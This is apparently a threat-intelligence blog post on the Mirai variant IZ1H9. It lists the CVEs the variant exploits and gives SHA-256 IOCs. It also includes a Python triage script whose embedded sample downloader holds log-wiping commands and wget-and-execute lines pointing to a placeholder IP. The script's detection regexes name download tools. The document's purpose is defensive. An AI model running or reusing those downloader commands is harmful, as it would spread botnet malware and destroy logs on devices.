Key Takeaways
What is Mirai IZ1H9?
FortiGuard Labs recently reported on IZ1H9, a Mirai variant that infects Linux-based devices, particularly IoT devices and consumer routers, and enlists them in a DDoS botnet.
IZ1H9 leverages at least thirteen different exploit payloads, several built from recently released public exploit code, targeting a number of CVEs. Some of those CVEs were disclosed as recently as this year.
IZ1H9 has been observed targeting a variety of Linux-based devices, including D-Link devices, Netis routers, Sunhillo SureLine, Geutebruck IP cameras, Yealink Device Management, Zyxel devices, TP-Link Archer routers, Korenix JetWave access points, and TOTOLINK routers.
The CVEs exploited by IZ1H9 include the following:
CVE-2015-1187, CVE-2016-20017, CVE-2020-25506, CVE-2021-45382
CVE-2015-1187, CVE-2016-20017, CVE-2020-25506, and CVE-2021-45382 are critical-severity vulnerabilities in D-Link devices that allow a remote attacker to achieve command injection by sending a crafted request to the device's web interface.
CVE-2019-19356
CVE-2019-19356 is an RCE vulnerability in the Netis WF2419 router's tracert (traceroute) diagnostic function. User-supplied input is passed to a system command without sanitization, so an attacker can inject arbitrary commands.
CVE-2021-36380, CVE-2021-33544/33548/33549/33550/33551/33552/33553/33554, CVE-2021-27561/27562
CVE-2021-36380 (Sunhillo SureLine), CVE-2021-33544 through CVE-2021-33554 (Geutebruck IP cameras), and CVE-2021-27561/27562 (Yealink Device Management) all allow arbitrary command execution.
CVE-2023-1389
CVE-2023-1389 is an unauthenticated command injection vulnerability in the web management interface of the TP-Link Archer AX21 (AX1800) router.
CVE-2023-23295
CVE-2023-23295 is a command injection vulnerability affecting Korenix JetWave wireless AP.
CVE-2022-40475/25080/25079/25081/25082/25078/25084/25077/25076/38511/25075/25083
CVE-2022-40475/25080/25079/25081/25082/25078/25084/25077/25076/38511/25075/25083 are command injection vulnerabilities in the web interfaces of several TOTOLINK router models.
Other Vulnerabilities
IZ1H9 also leverages an exploit targeting a vulnerability in the /bin/zhttpd/ component of Zyxel devices. In the absence of sufficient input validation, a threat actor can exploit the vulnerability to achieve RCE.
FortiGuard Labs also noted an additional exploit payload that targets devices which have not been identified. It appears to be very similar to a vulnerability affecting Prolink PRC2402M routers.
Once an exploit payload succeeds, the compromised device retrieves a shell script downloader from the C2 server. When the script is executed, it first deletes logs in an attempt to cover its tracks, then downloads and executes multiple bot clients built for a variety of Linux architectures, so that whichever binary matches the device's CPU will run.
As its last step, the shell script downloader blocks network connections on multiple ports by altering the device's iptables rules. The infected device is then leveraged as one of many in the botnet.
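The post-exploitation chain just described (log wiping, multi-architecture bot download and execution, iptables port blocking) is what a responder can look for on a suspect device's filesystem. The following Python is an added example, not PolySwarm's or FortiGuard's code: it matches files against the SHA-256 IOCs listed below and scores shell scripts for those three traits. The sample downloader script, the regex heuristics and the 203.0.113.10 address are constructed for illustration and are not the actual IZ1H9 script.

```python
"""Triage helpers for the IZ1H9 downloader behaviour described above.

Added example, not PolySwarm or FortiGuard code. The hash list is the
report's IOCs; the sample script and heuristics are constructed.
"""
import hashlib
import re
import tempfile
from pathlib import Path

# SHA-256 IOCs from the report's IOC list.
IZ1H9_SHA256 = {
    "c8cf29e56760c50fa815a0c1c14c17641f01b9c6a4aed3e0517e2ca722238f63",
    "1e15d7cd0b4682a86620b3046548bdf3f39c969324a85755216c2a526d784c0d",
    "7b9dce89619c16ac7d2e128749ad92444fe33654792a8b9ed2a3bce1fee82e6a",
    "b5daf57827ced323a39261a7e19f5551071b5095f0973f1397d5e4c2fcc39930",
    "b523ea86ebfd666153078593476ca9bd069d6f37fa7846af9e53b1e01c977a17",
    "8d07f15dd7d055b16d50cb271995b768fdd3ca6be121f6a35b61b917dfa33938",
    "df9ee47c783fbe8c3301ed519033fc92b05d7fd272d35c64b424a7e46c6da43b",
    "0aa9836174f231074d4d55c819f6f1570a24bc3ed4d9dd5667a04664acb57147",
}

# Constructed sample of a Mirai-style downloader with the three traits the
# report describes. It is NOT the real IZ1H9 script; 203.0.113.10 is a
# documentation address.
SAMPLE_DOWNLOADER = """#!/bin/sh
cd /tmp || cd /var/run || cd /mnt || cd /
rm -rf /var/log/*
rm -f /var/log/wtmp /var/log/lastlog
wget http://203.0.113.10/bins/bot.arm7 -O bot.arm7; chmod +x bot.arm7; ./bot.arm7
wget http://203.0.113.10/bins/bot.mips -O bot.mips; chmod +x bot.mips; ./bot.mips
wget http://203.0.113.10/bins/bot.mpsl -O bot.mpsl; chmod +x bot.mpsl; ./bot.mpsl
wget http://203.0.113.10/bins/bot.x86 -O bot.x86; chmod +x bot.x86; ./bot.x86
iptables -A INPUT -p tcp --destination-port 23 -j DROP
iptables -A INPUT -p tcp --dport 2323 -j DROP
iptables -A INPUT -p tcp --dport 7547 -j DROP
"""

# Architecture suffixes Mirai-family droppers commonly append to bot binaries;
# longest first so "arm7" is preferred over "arm" in the alternation.
ARCH_TOKENS = sorted(
    ("arm", "arm4", "arm5", "arm6", "arm7", "aarch64", "mips", "mipsel", "mpsl",
     "x86", "x86_64", "i586", "i686", "sh4", "ppc", "m68k", "spc"),
    key=len, reverse=True)

LOG_WIPE_RE = re.compile(
    r"^\s*rm\s+(?:-\S+\s+)*\S*(?:/var/log|/var/adm|wtmp|lastlog|\.log\b).*$", re.M)
FETCH_RE = re.compile(r"^.*\b(?:wget|curl|tftp|ftpget)\b.*$", re.M)
ARCH_RE = re.compile(r"[./](" + "|".join(map(re.escape, ARCH_TOKENS)) + r")\b")
IPTABLES_DROP_RE = re.compile(
    r"^\s*iptables\s+-[AI]\s+INPUT\b.*?--(?:dport|destination-port)\s+(\d+)"
    r".*?-j\s+(?:DROP|REJECT)", re.M)


def analyze_downloader(text: str) -> dict:
    """Score a shell script for the three downloader traits.

    The verdict is True when at least two traits are present; any one alone
    (e.g. a lone log cleanup) is common in benign scripts.
    """
    log_wipes = [m.group(0).strip() for m in LOG_WIPE_RE.finditer(text)]
    archs = set()
    for line in FETCH_RE.findall(text):
        archs.update(ARCH_RE.findall(line))
    ports = sorted({int(p) for p in IPTABLES_DROP_RE.findall(text)})
    traits = sum([bool(log_wipes), len(archs) >= 2, bool(ports)])
    return {
        "log_wipes": log_wipes,
        "bot_architectures": sorted(archs),
        "blocked_ports": ports,
        "verdict": traits >= 2,
    }


def sha256_file(path) -> str:
    """Hash a file in chunks so large firmware images do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def is_known_iz1h9(digest: str) -> bool:
    return digest.lower() in IZ1H9_SHA256


def scan_directory(root) -> list:
    """Flag files whose SHA-256 is an IOC, plus text files that score as a downloader."""
    hits = []
    for p in sorted(Path(root).rglob("*")):
        if not p.is_file():
            continue
        digest = sha256_file(p)
        if is_known_iz1h9(digest):
            hits.append((str(p), {"ioc_sha256": digest}))
            continue
        try:
            text = p.read_bytes().decode("utf-8")
        except UnicodeDecodeError:
            continue  # binary: only the hash check applies
        report = analyze_downloader(text)
        if report["verdict"]:
            hits.append((str(p), report))
    return hits


def self_test_scan() -> list:
    """Write constructed files to a temp dir and return the basenames scan_directory flags."""
    with tempfile.TemporaryDirectory() as d:
        Path(d, "dropper.sh").write_text(SAMPLE_DOWNLOADER)
        Path(d, "notes.txt").write_text("rm -f /var/log/old.log  # lone cleanup, benign\n")
        Path(d, "blob.bin").write_bytes(b"\x7fELF\xff\xfe\x00\x80")
        return [Path(path).name for path, _ in scan_directory(d)]


if __name__ == "__main__":
    import json
    print(json.dumps(analyze_downloader(SAMPLE_DOWNLOADER), indent=2))
    print("scan hits:", self_test_scan())
```

Run it against a mounted image of the device's filesystem (or a directory of pulled /tmp and /var/run contents) with scan_directory; the hash check is exact, while the script heuristics are deliberately loose and should be read as a prioritisation aid, not a verdict on their own.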
IOCs
PolySwarm has multiple samples of IZ1H9.
c8cf29e56760c50fa815a0c1c14c17641f01b9c6a4aed3e0517e2ca722238f63
1e15d7cd0b4682a86620b3046548bdf3f39c969324a85755216c2a526d784c0d
7b9dce89619c16ac7d2e128749ad92444fe33654792a8b9ed2a3bce1fee82e6a
b5daf57827ced323a39261a7e19f5551071b5095f0973f1397d5e4c2fcc39930
b523ea86ebfd666153078593476ca9bd069d6f37fa7846af9e53b1e01c977a17
8d07f15dd7d055b16d50cb271995b768fdd3ca6be121f6a35b61b917dfa33938
df9ee47c783fbe8c3301ed519033fc92b05d7fd272d35c64b424a7e46c6da43b
0aa9836174f231074d4d55c819f6f1570a24bc3ed4d9dd5667a04664acb57147
You can use the following CLI command to search for all IZ1H9 samples in our portal:
$ polyswarm link list -f IZ1H9
Don’t have a PolySwarm account? Go here to sign up for a free Community plan or to subscribe.
Contact us at hivemind@polyswarm.io | Check out our blog | Subscribe to our reports.